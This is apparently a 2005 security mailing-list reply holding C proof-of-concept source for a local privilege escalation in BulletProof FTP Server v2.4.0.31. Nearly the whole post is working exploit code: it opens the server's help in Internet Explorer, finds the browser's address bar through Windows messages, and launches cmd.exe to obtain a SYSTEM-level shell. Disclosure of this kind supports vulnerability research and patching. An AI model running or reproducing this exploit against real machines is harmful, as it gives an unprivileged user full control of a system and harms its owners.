Re: Privilege escalation in BulletProof FTP Server v2.4.0.31 [PoC]

Jerome ATHIAS <jerome.athias@xxxxxxx> · 29 Apr 2005 21:45:13 -0000



In-Reply-To: <80115b69050427102530b5ab91@xxxxxxxxxxxxxx>

//******************************************************************************
//Privilege escalation in BulletProof FTP Server v2.4.0.31
//By Jerome Athias
//jerome DOT athias AT free DOT fr
//Discovered by Reed Arvin reedarvin[at]gmail[dot]com 
//(http://reedarvin.thearvins.com)
//
//Little PoC
//Gives you a shell with system privileges
//******************************************************************************

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;
 char sText[]="%windir%\\system32\\cmd.exe";
 char buffer[256];

lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31");
if (!lHandle)
{
        printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n");
        return 0;
}
else
{
        printf("handle for BulletProof : 0x%X\n",lHandle);
}
SetForegroundWindow(lHandle);

SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!"
Sleep(5000);   //I need this time to drink a beer ;P

//Find the browser Handle
//lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox");
//if (!lHandle2)
//{
        lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer");
        lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL);

        printf("handle for IE : 0x%X\n",lHandle2);
        if (!lHandle2)
        {
                printf("\nError while finding the browser's window.\n");
        }
//}
//else
//{
//        printf("handle for Firefox : 0x%X\n",lHandle2);
//}
SetForegroundWindow(lHandle2);

lHandle=FindWindowEx(lHandle2, 0, "WorkerW", 0);
if (lHandle>=0)
{
        lHandle = FindWindowEx(lHandle, 0, "ReBarWindow32", 0);
        if (lHandle>=0)
        {
                //Where are you Charlie...
              lHandle = FindWindowEx(lHandle, 0, "ComboBoxEx32", 0);
              lHandle = FindWindowEx(lHandle, 0, "ComboBox", 0);
              lHandle = FindWindowEx(lHandle, 0, "Edit", 0);
        }
}
else
{
        printf("\nerror :-(\n");
}

SendMessage(lHandle, WM_SETFOCUS, 0, 0);
Sleep(300);
SendMessage(lHandle, WM_SETTEXT, 0, (LPARAM) sText);
//Shatter!
PostMessage(lHandle, WM_KEYDOWN, VK_RETURN, 0);
//whoami? :-)

return 0;
}